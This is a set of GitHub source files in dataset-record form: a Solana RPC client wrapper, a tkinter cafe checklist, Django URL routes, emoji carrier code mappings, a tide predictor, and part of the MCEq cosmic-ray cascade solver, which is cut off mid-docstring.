error_logs = error_data[\"logs\"] if \"logs\" in error_data else \"No logs\"\n parameters = json.dumps({\"jsonrpc\": \"2.0\", \"method\": method, \"params\": params})\n\n transaction: typing.Optional[Transaction] = None\n blockhash: typing.Optional[Blockhash] = None\n if method == \"sendTransaction\":\n transaction = Transaction.deserialize(b64decode(params[0]))\n blockhash = transaction.recent_blockhash\n\n if error_code == -32005:\n slots_behind: int = error[\"data\"][\"numSlotsBehind\"] if \"numSlotsBehind\" in error[\"data\"] else -1\n raise NodeIsBehindException(self.name, self.cluster_url, slots_behind)\n\n if error_err == \"BlockhashNotFound\":\n raise BlockhashNotFoundException(self.name, self.cluster_url, blockhash)\n\n exception_message: str = f\"Transaction failed with: '{error_message}'\"\n raise TransactionException(transaction, exception_message, error_code, self.name,\n self.cluster_url, method, parameters, response_text, error_accounts,\n error_err, error_logs, self.instruction_reporter)\n\n # The call succeeded.\n return typing.cast(RPCResponse, response)\n\n\nclass BetterClient:\n def __init__(self, client: Client, name: str, cluster_name: str, cluster_url: str, commitment: Commitment, skip_preflight: bool, encoding: str, blockhash_cache_duration: int, instruction_reporter: InstructionReporter) -> None:\n self.logger: logging.Logger = logging.getLogger(self.__class__.__name__)\n self.compatible_client: Client = client\n self.name: str = name\n self.cluster_name: str = cluster_name\n self.cluster_url: str = cluster_url\n self.commitment: Commitment = commitment\n self.skip_preflight: bool = skip_preflight\n self.encoding: str = encoding\n self.blockhash_cache_duration: int = blockhash_cache_duration\n self.instruction_reporter: InstructionReporter = instruction_reporter\n\n # kangda said in Discord: https://discord.com/channels/791995070613159966/836239696467591186/847816026245693451\n # \"I think you are better off doing 4,8,16,20,30\"\n self.retry_pauses: typing.Sequence[Decimal] = [Decimal(4), Decimal(\n 8), Decimal(16), Decimal(20), Decimal(30)]\n\n @staticmethod\n def from_configuration(name: str, cluster_name: str, cluster_url: str, commitment: Commitment, skip_preflight: bool, encoding: str, blockhash_cache_duration: int, instruction_reporter: InstructionReporter) -> \"BetterClient\":\n provider: HTTPProvider = ErrorHandlingProvider(name, cluster_url, instruction_reporter)\n blockhash_cache: typing.Union[BlockhashCache, bool] = False\n if blockhash_cache_duration > 0:\n blockhash_cache = BlockhashCache(blockhash_cache_duration)\n client: Client = Client(cluster_url, commitment=commitment, blockhash_cache=blockhash_cache)\n client._provider = provider\n\n return BetterClient(client, name, cluster_name, cluster_url, commitment, skip_preflight, encoding, blockhash_cache_duration, instruction_reporter)\n\n def get_balance(self, pubkey: typing.Union[PublicKey, str], commitment: Commitment = UnspecifiedCommitment) -> Decimal:\n resolved_commitment, _ = self.__resolve_defaults(commitment)\n response = self.compatible_client.get_balance(pubkey, resolved_commitment)\n value = Decimal(response[\"result\"][\"value\"])\n return value / SOL_DECIMAL_DIVISOR\n\n def get_account_info(self, pubkey: typing.Union[PublicKey, str], commitment: Commitment = UnspecifiedCommitment,\n encoding: str = UnspecifiedEncoding, data_slice: typing.Optional[DataSliceOpts] = None) -> typing.Any:\n resolved_commitment, resolved_encoding = self.__resolve_defaults(commitment, encoding)\n response = self.compatible_client.get_account_info(pubkey, resolved_commitment, resolved_encoding, data_slice)\n return response[\"result\"]\n\n def get_confirmed_signatures_for_address2(self, account: typing.Union[str, Keypair, PublicKey], before: typing.Optional[str] = None, until: typing.Optional[str] = None, limit: typing.Optional[int] = None) -> typing.Sequence[str]:\n response = self.compatible_client.get_confirmed_signature_for_address2(account, before, until, limit)\n return [result[\"signature\"] for result in response[\"result\"]]\n\n def get_confirmed_transaction(self, signature: str, encoding: str = \"json\") -> typing.Any:\n _, resolved_encoding = self.__resolve_defaults(None, encoding)\n response = self.compatible_client.get_confirmed_transaction(signature, resolved_encoding)\n return response[\"result\"]\n\n def get_minimum_balance_for_rent_exemption(self, size: int, commitment: Commitment = UnspecifiedCommitment) -> int:\n resolved_commitment, _ = self.__resolve_defaults(commitment)\n response = self.compatible_client.get_minimum_balance_for_rent_exemption(size, resolved_commitment)\n return int(response[\"result\"])\n\n def get_program_accounts(self, pubkey: typing.Union[str, PublicKey],\n commitment: Commitment = UnspecifiedCommitment,\n encoding: typing.Optional[str] = UnspecifiedEncoding,\n data_slice: typing.Optional[DataSliceOpts] = None,\n data_size: typing.Optional[int] = None,\n memcmp_opts: typing.Optional[typing.List[MemcmpOpts]] = None) -> typing.Any:\n resolved_commitment, resolved_encoding = self.__resolve_defaults(commitment, encoding)\n response = self.compatible_client.get_program_accounts(\n pubkey, resolved_commitment, resolved_encoding, data_slice, data_size, memcmp_opts)\n return response[\"result\"]\n\n def get_recent_blockhash(self, commitment: Commitment = UnspecifiedCommitment) -> Blockhash:\n resolved_commitment, _ = self.__resolve_defaults(commitment)\n response = self.compatible_client.get_recent_blockhash(resolved_commitment)\n return Blockhash(response[\"result\"][\"value\"][\"blockhash\"])\n\n def get_token_account_balance(self, pubkey: typing.Union[str, PublicKey], commitment: Commitment = UnspecifiedCommitment) -> Decimal:\n resolved_commitment, _ = self.__resolve_defaults(commitment)\n response = self.compatible_client.get_token_account_balance(pubkey, resolved_commitment)\n value = Decimal(response[\"result\"][\"value\"][\"amount\"])\n decimal_places = response[\"result\"][\"value\"][\"decimals\"]\n divisor = Decimal(10 ** decimal_places)\n return value / divisor\n\n def get_token_accounts_by_owner(self, owner: PublicKey, token_account_options: TokenAccountOpts, commitment: Commitment = UnspecifiedCommitment,) -> typing.Any:\n resolved_commitment, _ = self.__resolve_defaults(commitment)\n response = self.compatible_client.get_token_accounts_by_owner(owner, token_account_options, resolved_commitment)\n return response[\"result\"][\"value\"]\n\n def get_multiple_accounts(self, pubkeys: typing.List[typing.Union[PublicKey, str]], commitment: Commitment = UnspecifiedCommitment,\n encoding: str = UnspecifiedEncoding, data_slice: typing.Optional[DataSliceOpts] = None) -> typing.Any:\n resolved_commitment, resolved_encoding = self.__resolve_defaults(commitment, encoding)\n response = self.compatible_client.get_multiple_accounts(\n pubkeys, resolved_commitment, resolved_encoding, data_slice)\n return response[\"result\"][\"value\"]\n\n def send_transaction(self, transaction: Transaction, *signers: Keypair, opts: TxOpts = TxOpts(preflight_commitment=UnspecifiedCommitment)) -> str:\n proper_commitment: Commitment = opts.preflight_commitment\n if proper_commitment == UnspecifiedCommitment:\n proper_commitment = self.commitment\n\n proper_opts = TxOpts(preflight_commitment=proper_commitment,\n skip_confirmation=opts.skip_confirmation,\n skip_preflight=opts.skip_preflight)\n\n response = self.compatible_client.send_transaction(transaction, *signers, opts=proper_opts)\n return str(response[\"result\"])\n\n def wait_for_confirmation(self, transaction_ids: typing.Sequence[str], max_wait_in_seconds: int = 60) -> typing.Sequence[str]:\n self.logger.info(f\"Waiting up to {max_wait_in_seconds} seconds for {transaction_ids}.\")\n all_confirmed: typing.List[str] = []\n start_time: datetime.datetime = datetime.datetime.now()\n cutoff: datetime.datetime = start_time + datetime.timedelta(seconds=max_wait_in_seconds)\n for transaction_id in transaction_ids:\n while datetime.datetime.now() < cutoff:\n time.sleep(1)\n confirmed = self.get_confirmed_transaction(transaction_id)\n if confirmed is not None:\n self.logger.info(\n f\"Confirmed {transaction_id} after {datetime.datetime.now() - start_time} seconds.\")\n all_confirmed += [transaction_id]\n break\n\n if len(all_confirmed) != len(transaction_ids):\n self.logger.info(f\"Timed out after {max_wait_in_seconds} seconds waiting on transaction {transaction_id}.\")\n return all_confirmed\n\n def __resolve_defaults(self, commitment: typing.Optional[Commitment], encoding: typing.Optional[str] = None) -> typing.Tuple[Commitment, str]:\n if commitment is None or commitment == UnspecifiedCommitment:\n commitment = self.commitment\n\n if encoding is None or encoding == UnspecifiedEncoding:\n encoding = self.encoding\n\n return commitment, encoding\n\n def __str__(self) -> str:\n return f\"┬л ЁЭЩ▒ЁЭЪОЁЭЪЭЁЭЪЭЁЭЪОЁЭЪЫЁЭЩ▓ЁЭЪХЁЭЪТЁЭЪОЁЭЪЧЁЭЪЭ [{self.cluster_name}]: {self.cluster_url} ┬╗\"\n\n def __repr__(self) -> str:\n return f\"{self}\"\n","repo_name":"liqprotocol/mango-explorer","sub_path":"mango/client.py","file_name":"client.py","file_ext":"py","file_size_in_byte":20815,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"61"} +{"seq_id":"26834502782","text":"from tkinter import *\nimport reinigungsplancheckliste as cl\n\ndef Auswahlbereich(tkFenster0):\n # Header\n global T0\n T0 = Label(master=tkFenster0, text=\"Cafe - Checklisten\")\n T0.config(bg='#342216', fg=\"white\", font=(\"bold\", 26), borderwidth=0)\n T0.place(x=0, y=0, width=550, height=50)\n\n # Auswahlbereich-Text\n global T2\n T2 = Label(master=tkFenster0, text=\"Auswahlbereich\")\n T2.config(bg='#403027', fg=\"white\", font=(\"bold\", 14), borderwidth=0)\n T2.place(x=0, y=60, width=550, height=50)\n\n # Button zum Reinigungsplan\n global button0\n button0 = Button(master=tkFenster0, text=\"Reinigungsplan\", font=(\"bold\", 14), command=lambda: [cl.checkliste(tkFenster0), rplan_button()])\n button0.place(x=175, y=175, width=200, height=50)\n\ndef rplan_button():\n print(\"Hallo\")\n T2.destroy()\n button0.destroy()","repo_name":"mfroemmi/Cafe-Checkliste","sub_path":"auswahlbereich.py","file_name":"auswahlbereich.py","file_ext":"py","file_size_in_byte":845,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"74297152835","text":"from django.conf.urls import url\nfrom . import views\n\nurlpatterns = [\n url(r'^$', views.index),\n url(r'^about/$', views.about),\n url(r'^article/$', views._Article.as_view()),\n url(r'^article/(?P\\d+)', views.article_detail),\n url(r'^article_detail/$', views.article_detail),\n url(r'^mood/$', views._Mood.as_view()),\n url(r'^search/$', views.Search.as_view()),\n url(r'^class/(?P\\d+)', views.Class),\n url(r'^tag/(?P\\d+)', views.tag),\n]\n\n","repo_name":"BrightHao/easy_blog","sub_path":"demo/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":473,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"18291409789","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n#\n# Author: alisue\n# Date: 2011/03/24\n#\n# Ref: https://bitbucket.org/tokibito/django-bpmobile/src/7a09b1dea05c/bpmobile/utils.py\n# Ref: http://code.google.com/p/emoji4unicode/source/browse/trunk/src/carrier_data.py\n#\nfrom utils import code_to_unicode, code_to_sjis, get_range_from_code\nfrom thumbnails import get_docomo_thumbnail_urls, get_kddi_thumbnail_urls, get_softbank_thumbnail_urls\n\nclass Code(object):\n _name = None\n def __init__(self, e, fallback=None):\n self._id = e.get('id')\n code = e.get(self._name, None)\n if code:\n if code.startswith('>'):\n code = code[1:]\n self._duplicate = True\n else:\n self._duplicate = False\n self._code = code\n self._unicode = code_to_unicode(code)\n else:\n self._code = None\n self._unicode = None\n self._fallback = fallback\n def __unicode__(self):\n return self.unicode\n keyable = property(lambda self: self.code and not self.duplicate)\n duplicate = property(lambda self: self._duplicate)\n code = property(lambda self: self._code)\n unicode = property(lambda self: self._unicode or self.fallback)\n fallback = property(lambda self: self._fallback)\n\nclass Carrier(Code):\n _code_to_sjis_code_ranges = None\n def __init__(self, e, fallback):\n super(Carrier, self).__init__(e, fallback)\n if self.code:\n self._sjis_code = self._code_to_sjis_code(self.code)\n self._sjis = code_to_sjis(self._sjis_code)\n else:\n self._sjis_code = None\n self._sjis = None\n def _code_to_sjis_code(self, code):\n if not code:\n return None\n result = []\n for c in code.split(\"+\"):\n c = int(c, 16)\n range = get_range_from_code(c, self._code_to_sjis_code_ranges)\n offset = c - range[0]\n dst = range[2] + offset\n result.append(\"%04X\" % dst)\n return '+'.join(result)\n sjis_code = property(lambda self: self._sjis_code)\n sjis = property(lambda self: self._sjis or self.fallback.encode('cp932'))\n usjis = property(lambda self: self.sjis.decode('cp932', 'replace') or self.fallback)\n \n def _get_thumbnail_urls(self):\n raise NotImplementedError\n def _get_thumbnail_img(self):\n img = r\"\"\"\"%s\"\"\"\"\n fallback = self.fallback\n urls = self._get_thumbnail_urls()\n if urls is None:\n return fallback\n results = []\n for url in urls:\n results.append(img % (url, fallback, fallback))\n return u''.join(results)\n thumbnail = property(_get_thumbnail_img)\n \nclass Unicode(Code):\n _name = 'unicode'\n _encoding = 'utf8'\nclass Google(Code):\n _name = 'google'\n _encoding = 'utf8'\nclass DoCoMo(Carrier):\n _name = 'docomo'\n _encoding = 'cp932'\n _code_to_sjis_code_ranges = (\n (0xE63E, 0xE69B, 0xF89F, 0xF8FC),\n (0xE69C, 0xE6DA, 0xF940, 0xF97E),\n (0xE6DB, 0xE757, 0xF980, 0xF9FC),\n )\n _code_to_docomo_id_ranges = (\n (0xE63E, 0xE6A5, 0x0001, 0x0068),\n (0xE6AC, 0xE6AE, 0x00A7, 0x00A9),\n (0xE6B1, 0xE6B3, 0x00AA, 0x00AC),\n (0xE6B7, 0xE6BA, 0x00AD, 0x00B0),\n (0xE6CE, 0xE6EB, 0x0069, 0x0086),\n (0xE6EC, 0xE70A, 0x0088, 0x00A6),\n (0xE70B, 0xE70B, 0x0087, 0x0087),\n (0xE70C, 0xE757, 0x0001, 0x004C),\n )\n\n def __unicode__(self):\n return self.usjis\n _get_thumbnail_urls = get_docomo_thumbnail_urls\n \nclass KDDI(Carrier):\n _name = 'kddi'\n _encoding = 'cp932'\n _code_to_sjis_code_ranges = (\n (0xE468, 0xE4A6, 0xF640, 0xF67E),\n (0xE4A7, 0xE523, 0xF680, 0xF6FC),\n (0xE524, 0xE562, 0xF740, 0xF77E),\n (0xE563, 0xE5B4, 0xF780, 0xF7D1),\n (0xE5B5, 0xE5CC, 0xF7E5, 0xF7FC),\n (0xE5CD, 0xE5DF, 0xF340, 0xF352),\n (0xEA80, 0xEAAB, 0xF353, 0xF37E),\n (0xEAAC, 0xEAFA, 0xF380, 0xF3CE),\n (0xEAFB, 0xEB0D, 0xF7D2, 0xF7E4),\n (0xEB0E, 0xEB3B, 0xF3CF, 0xF3FC),\n (0xEB3C, 0xEB7A, 0xF440, 0xF47E),\n (0xEB7B, 0xEB8E, 0xF480, 0xF493), \n )\n def __unicode__(self):\n return self.usjis\n _get_thumbnail_urls = get_kddi_thumbnail_urls\n \nclass SoftBank(Carrier):\n _name = 'softbank'\n _encoding = 'utf8'\n _code_to_sjis_code_ranges = (\n (0xE001, 0xE03E, 0xF941, 0xF97E),\n (0xE03F, 0xE05A, 0xF980, 0xF99B),\n (0xE101, 0xE15A, 0xF741, 0xF79B),\n (0xE201, 0xE25A, 0xF7A1, 0xF7FA),\n (0xE301, 0xE34D, 0xF9A1, 0xF9ED),\n (0xE401, 0xE44C, 0xFB41, 0xFB8D),\n (0xE501, 0xE53E, 0xFBA1, 0xFBDE),\n )\n \n _get_thumbnail_urls = get_softbank_thumbnail_urls","repo_name":"lambdalisue/e4u","sub_path":"e4u/code.py","file_name":"code.py","file_ext":"py","file_size_in_byte":4831,"program_lang":"python","lang":"en","doc_type":"code","stars":7,"dataset":"github-code","pt":"61"} +{"seq_id":"42100355064","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Wed May 19 14:25:56 2021\n\n@author: ormondt\n\"\"\"\n\nimport cht_tide.constituent as cons\nfrom cht_tide.tide import Tide\n\n\ndef predict(data, times):\n all_constituents = [c for c in cons.noaa if c != cons._Z0]\n\n constituents = []\n for name in data.index.to_list():\n if name == \"MM\":\n name = \"Mm\"\n if name == \"MF\":\n name = \"Mf\"\n if name == \"SA\":\n name = \"Sa\"\n if name == \"SSA\":\n name = \"Ssa\"\n if name == \"MU2\":\n name = \"mu2\"\n if name == \"NU2\":\n name = \"nu2\"\n for cnst in all_constituents:\n if cnst.name == name:\n constituents.append(cnst)\n continue\n\n td = Tide(\n constituents=constituents,\n amplitudes=data.iloc[:, 0].to_list(),\n phases=data.iloc[:, 1].to_list(),\n )\n v = td.at(times)\n\n return v\n","repo_name":"Deltares/cht_tide","sub_path":"cht_tide/tide_predict.py","file_name":"tide_predict.py","file_ext":"py","file_size_in_byte":925,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"27087889958","text":"import os\nimport six\nfrom time import time\nimport numpy as np\nimport mceq_config as config\nfrom MCEq.misc import normalize_hadronic_model_name, info\nfrom MCEq.particlemanager import ParticleManager\nimport MCEq.data\n\n\nclass MCEqRun(object):\n \"\"\"Main class for handling the calculation.\n\n This class is the main user interface for the caclulation. It will\n handle initialization and various error/configuration checks. The\n setup has to be accomplished before invoking the integration routine\n is :func:`MCeqRun.solve`. Changes of configuration, such as:\n\n - interaction model in :meth:`MCEqRun.set_interaction_model`,\n - primary flux in :func:`MCEqRun.set_primary_model`,\n - zenith angle in :func:`MCEqRun.set_theta_deg`,\n - density profile in :func:`MCEqRun.set_density_model`,\n - member particles of the special ``obs_`` group in :func:`MCEqRun.set_obs_particles`,\n\n can be made on an active instance of this class, while calling\n :func:`MCEqRun.solve` subsequently to calculate the solution\n corresponding to the settings.\n\n The result can be retrieved by calling :func:`MCEqRun.get_solution`.\n\n\n Args:\n interaction_model (string): PDG ID of the particle\n density_model (string,sting,string): model type, location, season\n primary_model (class, param_tuple): classes derived from\n :class:`crflux.models.PrimaryFlux` and its parameters as tuple\n theta_deg (float): zenith angle :math:`\\\\theta` in degrees,\n measured positively from vertical direction\n adv_set (dict): advanced settings, see :mod:`mceq_config`\n obs_ids (list): list of particle name strings. Those lepton decay\n products will be scored in the special ``obs_`` categories\n \"\"\"\n\n def __init__(self, interaction_model, primary_model, theta_deg, **kwargs):\n\n self._mceq_db = MCEq.data.HDF5Backend()\n\n interaction_model = normalize_hadronic_model_name(interaction_model)\n\n # Save atmospheric parameters\n self.density_config = kwargs.pop('density_model', config.density_model)\n self.theta_deg = theta_deg\n\n #: Interface to interaction tables of the HDF5 database\n self._interactions = MCEq.data.Interactions(mceq_hdf_db=self._mceq_db)\n\n #: handler for cross-section data of type :class:`MCEq.data.HadAirCrossSections`\n self._int_cs = MCEq.data.InteractionCrossSections(\n mceq_hdf_db=self._mceq_db)\n\n #: handler for cross-section data of type :class:`MCEq.data.HadAirCrossSections`\n self._cont_losses = MCEq.data.ContinuousLosses(mceq_hdf_db=self._mceq_db,\n material=config.dedx_material)\n\n #: Interface to decay tables of the HDF5 database\n self._decays = MCEq.data.Decays(mceq_hdf_db=self._mceq_db)\n\n #: Particle manager (initialized/updated in set_interaction_model)\n self.pman = None\n\n # Particle list to keep track of previously initialized particles\n self._particle_list = None\n\n # General Matrix dimensions and shortcuts, controlled by\n # grid of yield matrices\n self._energy_grid = self._mceq_db.energy_grid\n\n # Initialize solution vector\n self._solution = np.zeros(1)\n # Initialize empty state (particle density) vector\n self._phi0 = np.zeros(1)\n # Initialize matrix builder (initialized in set_interaction_model)\n self.matrix_builder = None\n # Save initial condition (primary flux) to restore after dimensional resizing\n self._restore_initial_condition = []\n\n # Set interaction model and compute grids and matrices\n self.set_interaction_model(\n interaction_model,\n particle_list = kwargs.pop('particle_list', None),\n build_matrices = kwargs.pop('build_matrices', True)\n )\n\n # Default GPU device id for CUDA\n self._cuda_device = kwargs.pop('cuda_gpu_id', config.cuda_gpu_id)\n\n # Print particle list after tracking particles have been initialized\n self.pman.print_particle_tables(2)\n\n # Set atmosphere and geometry\n self.integration_path, self.int_grid, self.grid_var = None, None, None\n self.set_density_model(self.density_config)\n\n # Set initial flux condition\n if primary_model is not None:\n self.set_primary_model(*primary_model)\n\n @property\n def e_grid(self):\n \"\"\"Energy grid (bin centers)\"\"\"\n return self._energy_grid.c\n\n @property\n def e_bins(self):\n \"\"\"Energy grid (bin edges)\"\"\"\n return self._energy_grid.b\n\n @property\n def e_widths(self):\n \"\"\"Energy grid (bin widths)\"\"\"\n return self._energy_grid.w\n\n @property\n def dim(self):\n \"\"\"Energy grid (dimension)\"\"\"\n return self._energy_grid.d\n\n @property\n def dim_states(self):\n \"\"\"Number of cascade particles times dimension of grid\n (dimension of the equation system)\"\"\"\n return self.pman.dim_states\n \n def closest_energy(self, kin_energy):\n \"\"\"Convenience function to obtain the nearest grid energy\n to the `energy` argument, provided as kinetik energy in lab. frame.\"\"\"\n eidx = (np.abs(self._energy_grid.c - kin_energy)).argmin()\n return self._energy_grid.c[eidx]\n\n def get_solution(self,\n particle_name,\n mag=0.,\n grid_idx=None,\n integrate=False,\n return_as=config.return_as):\n \"\"\"Retrieves solution of the calculation on the energy grid.\n\n Some special prefixes are accepted for lepton names:\n\n - the total flux of muons, muon neutrinos etc. from all sources/mothers\n can be retrieved by the prefix ``total_``, i.e. ``total_numu``\n - the conventional flux of muons, muon neutrinos etc. from all sources\n can be retrieved by the prefix ``conv_``, i.e. ``conv_numu``\n - correspondigly, the flux of leptons which originated from the decay\n of a charged pion carries the prefix ``pi_`` and from a kaon ``k_``\n - conventional leptons originating neither from pion nor from kaon\n decay are collected in a category without any prefix, e.g. ``numu`` or\n ``mu+``\n\n Args:\n particle_name (str): The name of the particle such, e.g.\n ``total_mu+`` for the total flux spectrum of positive muons or\n ``pr_antinumu`` for the flux spectrum of prompt anti muon neutrinos\n mag (float, optional): 'magnification factor': the solution is\n multiplied by ``sol`` :math:`= \\\\Phi \\\\cdot E^{mag}`\n grid_idx (int, optional): if the integrator has been configured to save\n intermediate solutions on a depth grid, then ``grid_idx`` specifies\n the index of the depth grid for which the solution is retrieved. If\n not specified the flux at the surface is returned\n integrate (bool, optional): return averge particle number instead of\n flux (multiply by bin width)\n\n Returns:\n (numpy.array): flux of particles on energy grid :attr:`e_grid`\n \"\"\"\n\n res = np.zeros(self._energy_grid.d)\n ref = self.pman.pname2pref\n sol = None\n if grid_idx is not None and len(self.grid_sol) == 0:\n raise Exception(\n 'Solution not has not been computed on grid. Check input.')\n if grid_idx is None:\n sol = np.copy(self._solution)\n elif grid_idx >= len(self.grid_sol) or grid_idx is None:\n sol = self.grid_sol[-1, :]\n else:\n sol = self.grid_sol[grid_idx, :]\n\n def sum_lr(lep_str, prefix):\n result = np.zeros(self.dim)\n nsuccess = 0\n for ls in lep_str, lep_str + '_l', lep_str + '_r':\n if prefix + ls not in ref:\n info(\n 15, 'No separate left and right handed particles,',\n 'or, unavailable particle prefix {0}.'.format(prefix +\n ls))\n continue\n result += sol[ref[prefix + ls].lidx:ref[prefix + ls].uidx]\n nsuccess += 1\n if nsuccess == 0 and config.excpt_on_missing_particle:\n raise Exception(\n 'Requested particle {0} not found.'.format(particle_name))\n return result\n\n lep_str = particle_name.split(\n '_')[1] if '_' in particle_name else particle_name\n\n if particle_name.startswith('total_'):\n # Note: This has changed from previous MCEq versions,\n # since pi_ and k_ prefixes are mere tracking counters\n # and no full particle species anymore\n\n res = sum_lr(lep_str, prefix='')\n\n elif particle_name.startswith('conv_'):\n # Note: This changed from previous MCEq versions,\n # conventional is defined as total - prompt\n res = (self.get_solution('total_' + lep_str,\n mag=0,\n grid_idx=grid_idx,\n integrate=False,\n return_as='kinetic energy') -\n self.get_solution('pr_' + lep_str,\n mag=0,\n grid_idx=grid_idx,\n integrate=False,\n return_as='kinetic energy'))\n\n elif particle_name.startswith('pr_'):\n if 'prcas_' + lep_str in ref:\n res += sum_lr(lep_str, prefix='prcas_')\n if 'prres_' + lep_str in ref:\n res += sum_lr(lep_str, prefix='prres_')\n if 'em_' + lep_str in ref:\n res += sum_lr(lep_str, prefix='em_')\n else:\n try:\n res = sum_lr(particle_name, prefix='')\n except KeyError:\n info(10,\n 'Requested particle {0} not found.'.format(particle_name))\n\n # When returning in Etot, interpolate on different grid\n if return_as == 'total energy':\n etot_bins = self.e_bins + ref[lep_str].mass\n etot_grid = np.sqrt(etot_bins[1:] * etot_bins[:-1])\n\n if not integrate:\n return etot_grid, res * etot_grid**mag\n else:\n return etot_grid, res * etot_grid**mag * (etot_bins[1:] -\n etot_bins[:-1])\n\n elif return_as == 'kinetic energy':\n if not integrate:\n return res * self._energy_grid.c**mag\n else:\n return res * self._energy_grid.c**mag * self._energy_grid.w\n\n elif return_as == 'total momentum':\n ptot_bins = np.sqrt((self.e_bins + ref[lep_str].mass)**2 -\n ref[lep_str].mass**2)\n ptot_grid = np.sqrt(ptot_bins[1:] * ptot_bins[:-1])\n dEkindp = ptot_grid / np.sqrt(ptot_grid**2 + ref[lep_str].mass**2)\n res *= dEkindp\n if not integrate:\n return ptot_grid, res * ptot_grid**mag\n else:\n return ptot_grid, res * ptot_grid**mag * (ptot_bins[1:] -\n ptot_bins[:-1])\n\n else:\n raise Exception(\n \"Unknown 'return_as' variable choice.\",\n 'the options are \"kinetic energy\", \"total energy\", \"total momentum\"'\n )\n\n def set_interaction_model(self,\n interaction_model,\n particle_list=None,\n update_particle_list=True,\n force=False,\n build_matrices=True):\n \"\"\"Sets interaction model and/or an external charm model for calculation.\n\n Decay and interaction matrix will be regenerated automatically\n after performing this call.\n\n Args:\n interaction_model (str): name of interaction model\n charm_model (str, optional): name of charm model\n force (bool): force loading interaction model\n \"\"\"\n interaction_model = normalize_hadronic_model_name(interaction_model)\n\n info(1, interaction_model)\n\n if not force and (self._interactions.iam == interaction_model\n ) and particle_list != self._particle_list:\n info(2, 'Skip, since current model identical to',\n interaction_model + '.')\n return\n\n self._int_cs.load(interaction_model)\n\n # TODO: simplify this, stuff not needed anymore\n if not update_particle_list and self._particle_list is not None:\n info(10, 'Re-using particle list.')\n self._interactions.load(interaction_model,\n parent_list=self._particle_list)\n self.pman.set_interaction_model(self._int_cs, self._interactions)\n self.pman.set_decay_channels(self._decays)\n self.pman.set_continuous_losses(self._cont_losses)\n\n elif self._particle_list is None:\n info(10, 'New initialization of particle list.')\n # First initialization\n if particle_list is None:\n self._interactions.load(interaction_model)\n else:\n self._interactions.load(interaction_model,\n parent_list=particle_list)\n\n self._decays.load(parent_list=self._interactions.particles)\n self._particle_list = self._interactions.particles + self._decays.particles\n # Create particle database\n self.pman = ParticleManager(self._particle_list, self._energy_grid,\n self._int_cs)\n self.pman.set_interaction_model(self._int_cs, self._interactions)\n self.pman.set_decay_channels(self._decays)\n self.pman.set_continuous_losses(self._cont_losses)\n self.matrix_builder = MatrixBuilder(self.pman)\n\n elif (update_particle_list and particle_list != self._particle_list):\n info(10, 'Updating particle list.')\n # Updated particle list received\n if particle_list is None:\n self._interactions.load(interaction_model)\n else:\n self._interactions.load(interaction_model,\n parent_list=particle_list)\n self._decays.load(parent_list=self._interactions.particles)\n self._particle_list = self._interactions.particles + self._decays.particles\n self.pman.set_interaction_model(\n self._int_cs,\n self._interactions,\n updated_parent_list=self._particle_list)\n self.pman.set_decay_channels(self._decays)\n self.pman.set_continuous_losses(self._cont_losses)\n\n else:\n raise Exception('Should not happen in practice.')\n \n self._resize_vectors_and_restore()\n\n # initialize matrices\n if not build_matrices:\n return\n self.int_m, self.dec_m = self.matrix_builder.construct_matrices(\n skip_decay_matrix=False)\n\n def _resize_vectors_and_restore(self):\n \"\"\"Update solution and grid vectors if the number of particle species\n or the interaction models change. The previous state, such as the\n initial spectrum, are restored.\"\"\"\n\n # Update dimensions if particle dimensions changed\n self._phi0 = np.zeros(self.dim_states)\n self._solution = np.zeros(self.dim_states)\n\n # Restore insital condition if present\n if len(self._restore_initial_condition) > 0:\n for con in self._restore_initial_condition:\n con[0](*con[1:])\n\n def set_primary_model(self, mclass, tag):\n \"\"\"Sets primary flux model.\n\n This functions is quick and does not require re-generation of\n matrices.\n\n Args:\n interaction_model (:class:`CRFluxModel.PrimaryFlux`): reference\n to primary model **class**\n tag (tuple): positional argument list for model class\n \"\"\"\n\n info(1, mclass.__name__, tag if tag is not None else '')\n\n # Save primary flux model for restauration after interaction model changes\n self._restore_initial_condition = [\n (self.set_primary_model, mclass, tag)]\n # Initialize primary model object\n self.pmodel = mclass(tag)\n self.get_nucleon_spectrum = np.vectorize(self.pmodel.p_and_n_flux)\n\n try:\n self.dim_states\n except AttributeError:\n self.finalize_pmodel = True\n\n # Save initial condition\n minimal_energy = 3.\n if (2212, 0) in self.pman:\n e_tot = self._energy_grid.c + self.pman[(2212, 0)].mass\n else:\n info(\n 10,\n 'No protons in eqn system, quering primary flux with kinetic energy.'\n )\n e_tot = self._energy_grid.c\n\n min_idx = np.argmin(np.abs(e_tot - minimal_energy))\n self._phi0 *= 0\n p_top, n_top = self.get_nucleon_spectrum(e_tot[min_idx:])[1:]\n if (2212, 0) in self.pman:\n self._phi0[min_idx + self.pman[(2212, 0)].lidx:self.pman[(\n 2212, 0)].uidx] = 1e-4 * p_top\n else:\n info(\n 1,\n 'Warning protons not part of equation system, can not set primary flux.'\n )\n\n if (2112, 0) in self.pman and not self.pman[(2112, 0)].is_resonance:\n self._phi0[min_idx + self.pman[(2112, 0)].lidx:self.pman[(\n 2112, 0)].uidx] = 1e-4 * n_top\n elif (2212, 0) in self.pman:\n info(2, 'Neutrons not part of equation system,',\n 'substituting initial flux with protons.')\n self._phi0[min_idx + self.pman[(2212, 0)].lidx:self.pman[(\n 2212, 0)].uidx] += 1e-4 * n_top\n\n def set_single_primary_particle(self, E, corsika_id=None, pdg_id=None, append=False):\n \"\"\"Set type and kinetic energy of a single primary nucleus to\n calculation of particle yields.\n\n The functions uses the superposition theorem, where the flux of\n a nucleus with mass A and charge Z is modeled by using Z protons\n and A-Z neutrons at energy :math:`E_{nucleon}= E_{nucleus} / A`\n The nucleus type is defined via :math:`\\\\text{CORSIKA ID} = A*100 + Z`. For\n example iron has the CORSIKA ID 5226.\n\n Single leptons or hadrons can be defined by specifiying `pdg_id` instead of\n `corsika_id`.\n\n The `append` argument can be used to compose an initial state with\n multiple particles. If it is `False` the initial condition is reset to zero\n before adding the particle.\n\n A continuous input energy range is allowed between\n :math:`50*A~ \\\\text{GeV} < E_\\\\text{nucleus} < 10^{10}*A 